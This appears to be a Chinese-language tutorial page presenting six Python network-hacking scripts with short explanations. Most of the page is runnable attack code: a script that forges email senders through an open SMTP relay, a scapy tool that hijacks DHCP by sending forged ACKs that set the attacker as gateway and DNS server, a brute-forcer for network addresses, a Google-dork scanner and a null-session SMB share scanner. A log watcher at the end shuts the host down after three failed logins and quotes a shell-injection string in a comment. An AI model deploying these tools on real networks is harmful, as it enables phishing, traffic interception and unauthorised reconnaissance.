[Python] Bargain Box Kung Fu
1.Spoofing E-mail Sender
这段代码需要用户在本地自建一个不要求认证的 SMTP 服务器（即开放中继）。发件人之所以可以任意伪造，是因为 SMTP 协议本身不会校验 MAIL FROM 中的地址。
源码为:
2.IP Brute Forcer
当成功接入一个网络，却拿不到 IP 地址（DHCP 不给分配，也无法得知该网络的 IP 地址规划）时，攻击者会尝试通过暴力猜解的方式得到一个可用的 IP。
此程序先给网卡配置一个猜测的地址（需要 root 权限），然后再 ping 该网段常见的网关地址（.1 和 .254）；如果回复中含有 bytes from，就说明猜到了一个可用的网段，从而得到一个合法的 IP 地址。
源码为:
程序执行为:
3. Google-Hacks-Scanner
会用到第三方的 google 模块：先将要搜索的词保存在一个文件中（本例中为 dic.txt），然后 google.search() 函数逐个词调用谷歌进行搜索，之后用 re 的正则表达式从搜索结果的 URL 中挑出带有“twitter”关键字的 URL 并打印出来。
还有一点需要注意：如果搜索得过快，查询会被谷歌阻断；代码中 search() 的 pause=5 参数就是为此设置的请求间隔。
源码:
4.DHCP Hijack
通过 sniff 函数捕获所有目的端口为 67 的 UDP 包（需要 root 权限），随后检查该包是否是 DHCP-Request；如果是，则构造一个伪造的 DHCP-ACK 包发回客户端。伪造的 ACK 必须先于真实 DHCP 服务器的应答到达客户端才会被采用。
源码:
捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数 get_ips() 计算出 IP 范围，之后随机顺序遍历所有 IP 地址，并对每个地址调用外部命令 smbclient；-N 表示不提供口令（空会话），-L 列出目标上可匿名访问的共享。
源码:
6.Login Watcher
源码:
这段代码需要用户在本地自建一个不要求认证的 SMTP 服务器（即开放中继）。发件人之所以可以任意伪造，是因为 SMTP 协议本身不会校验 MAIL FROM 中的地址。
源码为:
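import socket

HOST = 'localhost'
PORT = 25
MAIL_TO = "someone@on_the_inter.net"
MAIL_FROM = "wweihnachtsmann@nordpol.net"
HELO_NAME = "du.da"
SUBJECT = "Dein Wunschzettel"
BODY_LINES = [
    "Selbstverstaendlich bekommst Du Dein Pony!",
    "Mfg der Weihnachtsmann",
]
CRLF = "\r\n"


def message_data(subject, body_lines):
    """Build the DATA section (without line terminators) of one message.

    Returns the header line, the empty line separating headers from body
    (missing in the original, so the body was parsed as headers), the body
    with dot-stuffing applied, and the lone '.' that ends DATA.  Without
    dot-stuffing a body line consisting of just '.' would end DATA early
    (RFC 5321, section 4.5.2).
    """
    lines = ["Subject: " + subject, ""]
    for line in body_lines:
        lines.append("." + line if line.startswith(".") else line)
    lines.append(".")
    return lines


def _read_reply(sock):
    """Read one (possibly multi-line) SMTP reply and return it as text.

    A reply is complete when its last line has a space in the fourth column
    ('250 ...'); continuation lines carry '-' there ('250-...').
    Raises socket.error if the server closes the connection mid-reply.
    """
    buf = b""
    while True:
        chunk = sock.recv(1024)
        if not chunk:
            raise socket.error("SMTP server closed the connection")
        buf += chunk
        if not buf.endswith(b"\r\n"):
            continue
        last = buf[:-2].split(b"\r\n")[-1]
        if len(last) == 3 or last[3:4] == b" ":
            return buf.decode("ascii", "replace")


def _command(sock, line):
    """Send one CRLF-terminated command and return the server's reply.

    Raises RuntimeError when the reply is not 2xx/3xx, so a rejected
    MAIL FROM / RCPT TO stops the dialogue instead of being talked past.
    """
    sock.sendall((line + CRLF).encode("ascii"))
    reply = _read_reply(sock)
    if reply[:1] not in ("2", "3"):
        raise RuntimeError("%r rejected: %s" % (line, reply.strip()))
    return reply


def send_mail(host, port, mail_from, mail_to, subject, body_lines):
    """Deliver one message with a forged envelope sender; return all replies.

    Plain SMTP does not verify MAIL FROM, which is why an unauthenticated
    local relay accepts any sender address.  Fixes over the original:
    the socket stays blocking (setblocking(0) before connect() makes
    connect() raise EINPROGRESS), every line is CRLF-terminated, the 220
    banner and every reply are actually read, and DATA is terminated by
    CRLF '.' CRLF.  Raises socket.error on connection problems and
    RuntimeError when the server rejects a command.
    """
    replies = []
    sock = socket.create_connection((host, port), timeout=10)
    try:
        replies.append(_read_reply(sock))  # 220 greeting
        for line in ("HELO " + HELO_NAME,
                     "MAIL FROM:<%s>" % mail_from,
                     "RCPT TO:<%s>" % mail_to,
                     "DATA"):
            replies.append(_command(sock, line))
        payload = CRLF.join(message_data(subject, body_lines)) + CRLF
        sock.sendall(payload.encode("ascii"))
        replies.append(_read_reply(sock))  # 250 queued, or a rejection
        replies.append(_command(sock, "QUIT"))
    finally:
        sock.close()
    return replies


if __name__ == "__main__":
    for reply in send_mail(HOST, PORT, MAIL_FROM, MAIL_TO, SUBJECT, BODY_LINES):
        print(repr(reply))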
2.IP Brute Forcer
当成功接入一个网络，却拿不到 IP 地址（DHCP 不给分配，也无法得知该网络的 IP 地址规划）时，攻击者会尝试通过暴力猜解的方式得到一个可用的 IP。
此程序先给网卡配置一个猜测的地址（需要 root 权限），然后再 ping 该网段常见的网关地址（.1 和 .254）；如果回复中含有 bytes from，就说明猜到了一个可用的网段，从而得到一个合法的 IP 地址。
源码为:
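import re
import subprocess
import sys
from random import randint

device = "wlan0"
NET_PREFIX = "10.0."
ips = list(range(1, 254))

_REPLY_RE = re.compile(r"bytes from")


def has_reply(ping_output):
    """True when ping's output contains an echo-reply line ('... bytes from ...')."""
    return _REPLY_RE.search(ping_output) is not None


def ifconfig_cmd(device, net_byte, host_byte):
    """argv that configures `device` as 10.0.<net_byte>.<host_byte>.

    The original built the command by string concatenation and dropped both
    the '10.0.' prefix and the spaces around the address, producing e.g.
    'ifconfig wlan05.17up'; a list argv also keeps the call out of a shell.
    """
    address = "%s%d.%d" % (NET_PREFIX, net_byte, host_byte)
    return ["ifconfig", device, address, "up"]


def ping_ip(ip):
    """Send one echo request to `ip` (1 s timeout).

    On a reply, print the address and exit 0 (the original exited 1, i.e.
    signalled failure on success).  A missing ping binary is treated as
    'no reply'.
    """
    try:
        output = subprocess.check_output(["ping", "-c", "1", "-W", "1", ip])
    except subprocess.CalledProcessError as err:  # non-zero = no reply
        output = err.output or b""
    except OSError:
        return
    if has_reply(output.decode("ascii", "replace")):
        print("Got response from " + ip)
        sys.exit(0)


def main():
    """Try 10.0.X.0/24 nets in random order until a gateway answers.

    Needs root (ifconfig).  For each candidate net the interface gets a
    random host address and the usual gateway addresses .1 and .254 are
    pinged.
    """
    candidates = list(ips)
    while candidates:
        net_byte = candidates.pop(randint(0, len(candidates) - 1))
        host_byte = randint(2, 253)
        print("Checking net %s%d.0" % (NET_PREFIX, net_byte))
        subprocess.call(ifconfig_cmd(device, net_byte, host_byte))
        ping_ip("%s%d.1" % (NET_PREFIX, net_byte))
        ping_ip("%s%d.254" % (NET_PREFIX, net_byte))


if __name__ == "__main__":
    main()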
程序执行为:
3. Google-Hacks-Scanner
会用到第三方的 google 模块：先将要搜索的词保存在一个文件中（本例中为 dic.txt），然后 google.search() 函数逐个词调用谷歌进行搜索，之后用 re 的正则表达式从搜索结果的 URL 中挑出带有“twitter”关键字的 URL 并打印出来。
还有一点需要注意：如果搜索得过快，查询会被谷歌阻断；代码中 search() 的 pause=5 参数就是为此设置的请求间隔。
源码:
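import re
import sys

try:  # Python 2
    from urllib2 import HTTPError
except ImportError:  # Python 3
    from urllib.error import HTTPError

KEYWORD = "twitter"


def matching_links(links, keyword=KEYWORD):
    """Return the links whose URL matches `keyword` (re.search, as the original)."""
    return [link for link in links if re.search(keyword, link)]


def search_words(words, keyword=KEYWORD, pause=5):
    """Google each (stripped, non-empty) word and print the matching result URLs.

    `pause` is the delay between requests; Google blocks clients that query
    too fast.  A KeyError from the google module (swallowed silently in the
    original) and an HTTPError are reported per word and the scan continues.
    """
    import google  # third-party; imported here so matching_links() works without it

    for word in words:
        word = word.strip()
        if not word:
            continue
        print("\nSearching for " + word)
        try:
            for link in matching_links(google.search(word, pause=pause), keyword):
                print(link)
        except KeyError as err:
            print("Google search returned an unexpected page: " + str(err))
        except HTTPError as err:
            print("Google search failed: " + str(err))


def main(argv):
    """Usage: script <dict>; the dictionary file holds one search term per line."""
    if len(argv) < 2:
        print(argv[0] + ": <dict>")
        sys.exit(1)
    with open(argv[1]) as fh:  # the original never closed the file
        search_words(fh)


if __name__ == "__main__":
    main(sys.argv)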
4.DHCP Hijack
通过 sniff 函数捕获所有目的端口为 67 的 UDP 包（需要 root 权限），随后检查该包是否是 DHCP-Request；如果是，则构造一个伪造的 DHCP-ACK 包发回客户端。伪造的 ACK 必须先于真实 DHCP 服务器的应答到达客户端才会被采用。
源码:
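import sys
import getopt
import random

try:
    import scapy.all as scapy
except ImportError:  # the pure helpers below stay importable; main() needs scapy
    scapy = None

dev = "eth0"
gateway = None
nameserver = None
dhcpserver = None
client_net = "192.168.1."
bpf_filter = "udp port 67"  # was `filter`, which shadowed the builtin
lease_time = 3600

DHCP_REQUEST = 3
DHCP_ACK = 5


def dhcp_message_type(options):
    """Return the DHCP message-type code from a scapy options list, or None.

    Options are (name, value) tuples; bare strings such as 'end'/'pad' in the
    same list are skipped.
    """
    for opt in options:
        if isinstance(opt, tuple) and opt and opt[0] == "message-type":
            return opt[1]
    return None


def ack_options(client_ip, gateway, nameserver, dhcpserver, lease=lease_time):
    """Option list for the forged DHCPACK.

    RFC 2131 (table 3) requires 'server identifier' and 'IP address lease
    time' in an ACK answering a DHCPREQUEST, and forbids 'requested IP
    address' there; the original omitted the first two and sent the third,
    so conforming clients could ignore the reply.
    """
    return [
        ("message-type", DHCP_ACK),
        ("server_id", dhcpserver),
        ("lease_time", lease),
        ("subnet_mask", "255.255.255.0"),
        ("router", gateway),
        ("name_server", nameserver),
        "end",
    ]


def handle_packet(packet):
    """sniff() callback: answer every DHCPREQUEST with a forged DHCPACK."""
    dhcp = packet.getlayer(scapy.DHCP)
    if not dhcp or dhcp_message_type(dhcp.options) != DHCP_REQUEST:
        return  # None: scapy would print a returned False
    eth = packet.getlayer(scapy.Ether)
    ip = packet.getlayer(scapy.IP)
    udp = packet.getlayer(scapy.UDP)
    bootp = packet.getlayer(scapy.BOOTP)
    client_ip = client_net + str(random.randint(2, 254))
    # Ether src is left to scapy (the interface MAC): the request is usually
    # broadcast, so the original's src=eth.dst was ff:ff:ff:ff:ff:ff.
    # chaddr must be the client's hardware address as carried in the request;
    # the original used eth.dst (the broadcast/server MAC).
    ack = (
        scapy.Ether(dst=eth.src)
        / scapy.IP(src=dhcpserver, dst=client_ip)
        / scapy.UDP(sport=udp.dport, dport=udp.sport)
        / scapy.BOOTP(op=2, chaddr=bootp.chaddr, siaddr=gateway,
                      yiaddr=client_ip, xid=bootp.xid)
        / scapy.DHCP(options=ack_options(client_ip, gateway, nameserver, dhcpserver))
    )
    print("Send spoofed DHCP ACK to %s" % ip.src)
    scapy.sendp(ack, iface=dev)


def usage():
    print(sys.argv[0] + " -d <dns_ip> -g <gateway_ip> -i <dev> -s <dhcp_ip>")
    sys.exit(1)


def main(argv):
    """Parse options, default gateway/DNS/DHCP-server to our own address, sniff.

    Needs root (raw sockets).  The forged ACK only wins if it reaches the
    client before the real server's reply.
    """
    global dev, gateway, nameserver, dhcpserver
    if scapy is None:
        sys.exit("scapy is required: pip install scapy")
    try:
        opts, _args = getopt.getopt(argv[1:], "d:g:i:s:")
    except getopt.GetoptError:
        usage()
    for flag, value in opts:
        if flag == "-i":
            dev = value
        elif flag == "-g":
            gateway = value
        elif flag == "-d":
            nameserver = value
        elif flag == "-s":
            dhcpserver = value
        else:
            usage()
    if not gateway:
        gateway = scapy.get_if_addr(dev)
    if not nameserver:
        nameserver = gateway
    if not dhcpserver:
        dhcpserver = gateway
    print("Hijacking DHCP requests on %s" % dev)
    scapy.sniff(iface=dev, filter=bpf_filter, prn=handle_packet)


if __name__ == "__main__":
    main(sys.argv)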
捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数 get_ips() 计算出 IP 范围，之后随机顺序遍历所有 IP 地址，并对每个地址调用外部命令 smbclient；-N 表示不提供口令（空会话），-L 列出目标上可匿名访问的共享。
源码:
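import random
import socket
import struct
import subprocess
import sys


def ip_to_int(ip):
    """Dotted-quad IPv4 string -> 32-bit int; raises socket.error when malformed."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def int_to_ip(value):
    """32-bit int -> dotted-quad IPv4 string."""
    return socket.inet_ntoa(struct.pack("!I", value))


def get_ips(start_ip, stop_ip):
    """Return every address from start_ip to stop_ip inclusive (empty if start > stop).

    Same result as the original hex-string conversion, but via inet_aton,
    which also rejects malformed input instead of raising ValueError from
    long().
    """
    start, stop = ip_to_int(start_ip), ip_to_int(stop_ip)
    return [int_to_ip(n) for n in range(start, stop + 1)]


def smb_share_scan(ip):
    """List the shares of `ip` via a null session; output goes to stdout.

    argv list, not a shell string: the original pasted argv[1] straight into
    os.system() (and without the space after -L).  Raises OSError if
    smbclient is not installed.
    """
    subprocess.call(["smbclient", "-q", "-N", "-L", ip])


def main(argv):
    """Usage: script <start_ip-stop_ip> or script <host>; scans in random order."""
    if len(argv) < 2:
        print(argv[0] + ": <start_ip-stop_ip>")
        sys.exit(1)
    start_ip, sep, stop_ip = argv[1].partition("-")
    if sep:
        try:
            targets = get_ips(start_ip, stop_ip)
        except socket.error:
            sys.exit("invalid IP range: " + argv[1])
    else:
        targets = [argv[1]]
    random.shuffle(targets)
    try:
        for target in targets:
            smb_share_scan(target)
    except OSError as err:
        sys.exit("cannot run smbclient: %s" % err)


if __name__ == "__main__":
    main(sys.argv)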
6.Login Watcher
源码:
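import random
import re
import shlex
import subprocess
import sys

try:
    import tailer
except ImportError:  # only main() needs it; the helpers stay importable without it
    tailer = None

logfile = "/var/log/auth.log"
max_failed = 3
# Reaction to max_failed failures for one user. Note the obvious DoS: anyone
# who can reach sshd can take the box down with three bad passwords.
max_failed_cmd = "/sbin/shutdown -h now"
failed_login = {}
success_patterns = [
    re.compile(r"Accepted password for (?P<user>.+?) from (?P<host>.+?) port"),
    re.compile(r"session opened for user (?P<user>.+?) by"),
]
failed_patterns = [
    re.compile(r"Failed password for (?P<user>.+?) from (?P<host>.+?) port"),
    re.compile(r"FAILED LOGIN (\(\d\)) on '(.+?)' FOR '(?P<user>.+?)'"),
    re.compile(r"authentication failure\;.+?user\=(?P<user>.+?)\s+.+?\s+user\=(.+)"),
]
shutdown_msgs = [
    "Eat my shorts",
    "Follow the white rabbit",
    "System will explode in three seconds!",
    "Go home and leave me alone.",
    "Game... Over!",
]


def match_login(line, pattern):
    """Return (user, host) when `pattern` matches `line`, else None.

    host is None for patterns that have no <host> group (local logins); the
    original called match.group('host') unconditionally, which raises
    IndexError for those patterns.
    """
    match = pattern.search(line)
    if match is None:
        return None
    groups = match.groupdict()
    return groups["user"], groups.get("host")


def speak(text):
    """Feed `text` to festival's text-to-speech; print it if festival is missing.

    Deliberately no shell: user name and host are taken from auth.log, i.e.
    they are attacker-chosen (anyone can attempt a login as "'; rm -rf / #"),
    and this watcher runs as root so it can shut the machine down.  The
    original interpolated them into an os.system() string.
    """
    try:
        proc = subprocess.Popen(["festival", "--tts"], stdin=subprocess.PIPE)
    except OSError:
        print(text)
        return
    proc.communicate((text + "\n").encode("utf-8", "replace"))


def check_match(line, pattern, failed_login_check):
    """Apply one pattern to a log line and react to it.

    failed_login_check=True means `pattern` is a failure pattern: the event
    is announced and the user's failure counter incremented (also for local
    failures without a host, which crashed the original).  Otherwise a
    success resets the counter; local successes of CRON are ignored.  Once a
    user reaches max_failed, a random message is spoken and max_failed_cmd
    is run.  Returns True when the pattern matched.
    """
    found = match_login(line, pattern)
    if found is None:
        return False
    user, host = found
    failed_login.setdefault(user, 0)
    if failed_login_check:
        if host is not None:
            speak("Login for user " + user + " from host " + host + " failed!")
        else:
            speak("Login for user " + user + " failed!")
        failed_login[user] += 1
    elif host is not None:
        speak("User " + user + " logged in from host " + host)
        failed_login[user] = 0
    elif user != "CRON":
        speak("User " + user + " logged in")  # original lacked the space
        failed_login[user] = 0
    if failed_login[user] >= max_failed:
        speak(random.choice(shutdown_msgs))
        subprocess.call(shlex.split(max_failed_cmd))
    return True


def process_line(line):
    """Try the failure patterns first, then the success patterns; stop at the first hit."""
    for pattern in failed_patterns:
        if check_match(line, pattern, True):
            return
    for pattern in success_patterns:
        if check_match(line, pattern, False):
            return


def main():
    """Follow the auth log forever and react to each new line."""
    if tailer is None:
        sys.exit("the 'tailer' module is required (pip install tailer)")
    with open(logfile) as fh:
        for line in tailer.follow(fh):
            process_line(line)


if __name__ == "__main__":
    main()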